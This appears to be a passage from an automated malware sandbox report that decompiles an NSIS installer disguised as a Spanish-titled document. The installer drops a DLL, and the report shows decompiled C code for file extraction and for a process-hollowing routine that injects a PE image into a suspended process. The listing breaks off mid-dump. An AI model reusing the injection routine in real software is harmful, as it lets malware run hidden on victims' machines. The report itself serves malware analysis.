                        0x00000000
                        0x00000000
                        0x00402d31
                        0x00402d38
                        0x00000000
                        0x00000000
                        0x00402d3a
                        0x00402d41
                        0x00000000
                        0x00000000
                        0x00402d43
                        0x00402d4a
                        0x00000000
                        0x00000000
                        0x00402d4c
                        0x00402d53
                        0x00000000
                        0x00000000
                        0x00402d55
                        0x00402d5b
                        0x00402d64
                        0x00402d6a
                        0x00402d6d
                        0x00402d6f
                        0x00402d75
                        0x00000000
                        0x00000000
                        0x00402d7b
                        0x00402d7f
                        0x00402d87
                        0x00402d87
                        0x00402d8a
                        0x00402d8d
                        0x00402d8f
                        0x00402d91
                        0x00402d91
                        0x00000000
                        0x00402d8f
                        0x00402d81
                        0x00402d85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402da3
                        0x00402da3
                        0x00402da9
                        0x00402db5
                        0x00402db5
                        0x00402db8
                        0x00402dbe
                        0x00402dc0
                        0x00402dc0
                        0x00402dc8
                        0x00402dc8
                        0x00000000
                        0x00402dc8

                        APIs
                        • GetTickCount.KERNEL32 ref: 00402C66
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,00000400), ref: 00402C82
                          • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,80000000,00000003), ref: 004058A2
                          • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                        • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,80000000,00000003), ref: 00402CCE
                        Strings
                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                        • Null, xrefs: 00402D4C
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                        • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                        • Inst, xrefs: 00402D3A
                        • soft, xrefs: 00402D43
                        • Error launching installer, xrefs: 00402CA5
                        • "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" , xrefs: 00402C55
                        • C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                        • API String ID: 4283519449-4123650333
                        • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                        • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                        • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                        • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402E8E, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0xa139
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034("�TA");
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x419eea
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x419eea
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                        0x00402e96
                        0x00402e9a
                        0x00402e9d
                        0x00402ea2
                        0x00402ea4
                        0x00402ea4
                        0x00402eab
                        0x00402eaf
                        0x00402eb4
                        0x00402eb6
                        0x00402eb6
                        0x00402ebd
                        0x00402ec2
                        0x00402ec4
                        0x00402ecd
                        0x00402ecd
                        0x00402ed8
                        0x00402edf
                        0x0040305b
                        0x0040305b
                        0x00000000
                        0x00402ee5
                        0x00402ee9
                        0x00403046
                        0x0040309b
                        0x00403060
                        0x00403066
                        0x00403068
                        0x00403068
                        0x00403079
                        0x00000000
                        0x0040307b
                        0x0040308e
                        0x00403040
                        0x00403040
                        0x0040305d
                        0x0040305d
                        0x00000000
                        0x00403095
                        0x00403095
                        0x00403098
                        0x00000000
                        0x00403098
                        0x0040308e
                        0x00403079
                        0x004030a6
                        0x00000000
                        0x004030a6
                        0x0040304b
                        0x0040304d
                        0x0040304d
                        0x00403059
                        0x004030a3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403059
                        0x00402ef5
                        0x00402ef7
                        0x00402efe
                        0x00402f05
                        0x00402f05
                        0x00402f0c
                        0x00402f14
                        0x00402f1e
                        0x00402f23
                        0x00402f2b
                        0x00402f35
                        0x00402f38
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f3e
                        0x00402f3e
                        0x00402f3e
                        0x00402f46
                        0x00402f48
                        0x00402f48
                        0x00402f59
                        0x00000000
                        0x00000000
                        0x00402f5f
                        0x00402f62
                        0x00402f68
                        0x00402f6e
                        0x00402f6e
                        0x00402f79
                        0x00402f7f
                        0x00402f84
                        0x00402f8b
                        0x00402f8e
                        0x00000000
                        0x00000000
                        0x00402f94
                        0x00402f9a
                        0x00402f9c
                        0x00402fa5
                        0x00402fa7
                        0x00402fd5
                        0x00402fdb
                        0x00402fe4
                        0x00402fe9
                        0x00402fe9
                        0x00402ff0
                        0x00403034
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402ff2
                        0x00402ff5
                        0x00403017
                        0x0040301c
                        0x0040301f
                        0x00403022
                        0x00403025
                        0x00403029
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040302f
                        0x00403003
                        0x0040300b
                        0x00000000
                        0x00403012
                        0x00403012
                        0x00000000
                        0x00403012
                        0x0040300b
                        0x00402ff0
                        0x0040303c
                        0x00000000
                        0x0040303c
                        0x00000000
                        0x00402f3e

                        APIs
                        • GetTickCount.KERNEL32 ref: 00402EF5
                        • GetTickCount.KERNEL32 ref: 00402F9C
                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                        • wsprintfA.USER32 ref: 00402FD5
                        • WriteFile.KERNELBASE(00000000,00000000,00419EEA,7FFFFFFF,00000000), ref: 00403003
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountTick$FileWritewsprintf
                        • String ID: %p, %u, %s, %p stub.$... %d%%$HLA$HLA$TA
                        • API String ID: 4209647438-1731558659
                        • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                        • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                        • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                        • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 73%
                        			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\alfons\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\alfons\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















                        0x00401751
                        0x00401758
                        0x00401761
                        0x00401764
                        0x00401767
                        0x0040176c
                        0x00401774
                        0x00401790
                        0x00401776
                        0x00401776
                        0x00401777
                        0x00401777
                        0x00401796
                        0x004017a0
                        0x004017a0
                        0x004017a4
                        0x004017a7
                        0x004017ac
                        0x004017ae
                        0x004017b0
                        0x004017b5
                        0x004017b5
                        0x004017c0
                        0x004017c0
                        0x004017d1
                        0x004017d3
                        0x004017d3
                        0x004017d4
                        0x004017d4
                        0x004017d7
                        0x004017da
                        0x004017dd
                        0x004017dd
                        0x004017e4
                        0x004017f3
                        0x004017f8
                        0x004017fb
                        0x004017fe
                        0x00000000
                        0x00000000
                        0x00401800
                        0x00401803
                        0x0040185d
                        0x00401862
                        0x004015a8
                        0x0040268f
                        0x0040268f
                        0x004028be
                        0x004028c1
                        0x004028c1
                        0x00000000
                        0x00401805
                        0x0040180b
                        0x00401816
                        0x00401823
                        0x0040182e
                        0x00401844
                        0x00401844
                        0x00401847
                        0x00000000
                        0x0040184d
                        0x0040184d
                        0x0040184e
                        0x0040186b
                        0x004028c7
                        0x004028c7
                        0x004028c7
                        0x00401850
                        0x00401850
                        0x00401851
                        0x00401492
                        0x00402241
                        0x00402241
                        0x00402241
                        0x0040184e
                        0x00401847
                        0x004028c9
                        0x004028cd
                        0x004028cd
                        0x0040187b
                        0x00401880
                        0x0040188e
                        0x00401893
                        0x00401899
                        0x0040189d
                        0x0040189f
                        0x004018a7
                        0x004018b3
                        0x004018a1
                        0x004018a1
                        0x004018a5
                        0x00000000
                        0x00000000
                        0x004018a5
                        0x004018bc
                        0x004018c2
                        0x004018c4
                        0x00000000
                        0x004018ca
                        0x004018ca
                        0x004018cd
                        0x004018e5
                        0x004018cf
                        0x004018d2
                        0x004018db
                        0x004018db
                        0x004018ea
                        0x004018ef
                        0x0040223c
                        0x00000000
                        0x0040223c
                        0x00000000

                        APIs
                        • lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                        • CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,dah Setup,NSIS Error), ref: 00405BD4
                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419EEA,7519EA30), ref: 00404F0F
                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsk2A27.tmp$C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll$TclpOwkq
                        • API String ID: 1941528284-2203473759
                        • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                        • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                        • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                        • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                        0x00405380
                        0x00405384
                        0x00405387
                        0x0040538d
                        0x00405391
                        0x00405395
                        0x0040539d
                        0x004053a4
                        0x004053aa
                        0x004053b1
                        0x004053b8
                        0x004053c0
                        0x004053c2
                        0x00000000
                        0x004053c2
                        0x004053cc
                        0x004053d3
                        0x004053e9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004053eb
                        0x004053ef

                        APIs
                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                        • GetLastError.KERNEL32 ref: 004053CC
                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                        • GetLastError.KERNEL32 ref: 004053EB
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                        • API String ID: 3449924974-776639217
                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                        • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                        • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333C1DA, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E7333C1DA(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E7333B737();
				_v68 = E7333B7E6(_v12, 0xff7f721a);
				_v76 = E7333B7E6(_v12, 0x7fe2736c);
				_v80 = E7333B7E6(_v12, 0x7fa1f993);
				_v84 = E7333B7E6(_v12, 0x7fa3ef6e);
				_v92 = E7333B7E6(_v12, 0xff31bf16);
				_v72 = E7333B7E6(_v12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_v88 = E7333B7E6(_v12, 0x7fb1f910);
				_v64 = _a4;
				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_push(_a4);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E7333B2D7(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E7333B2D7(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E7333B2D7(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E7333B226(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E7333B3D8(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}































                        0x7333c1e8
                        0x7333c1f8
                        0x7333c208
                        0x7333c218
                        0x7333c228
                        0x7333c238
                        0x7333c248
                        0x7333c24b
                        0x7333c258
                        0x7333c25e
                        0x7333c26a
                        0x7333c277
                        0x7333c27b
                        0x7333c27e
                        0x7333c288
                        0x7333c28b
                        0x7333c294
                        0x7333c29b
                        0x7333c2a2
                        0x7333c2a2
                        0x7333c2a7
                        0x7333c2b4
                        0x7333c2b7
                        0x7333c2c0
                        0x7333c2c7
                        0x7333c2ce
                        0x7333c2ce
                        0x7333c2d9
                        0x7333c2dc
                        0x7333c2e7
                        0x7333c2e8
                        0x7333c2ef
                        0x7333c323
                        0x7333c32d
                        0x7333c346
                        0x7333c36a
                        0x7333c377
                        0x7333c37d
                        0x7333c3a7
                        0x7333c3c0
                        0x7333c3c7
                        0x7333c3d1
                        0x7333c3d6
                        0x7333c3d9
                        0x7333c3dc
                        0x7333c3df
                        0x7333c3e2
                        0x7333c3e9
                        0x7333c3f3
                        0x7333c400
                        0x7333c40c
                        0x7333c415
                        0x7333c427
                        0x7333c428
                        0x7333c42c
                        0x7333c432
                        0x7333c436
                        0x7333c437
                        0x7333c43a
                        0x7333c3fd
                        0x7333c3fd
                        0x7333c441
                        0x7333c443
                        0x7333c448
                        0x7333c452
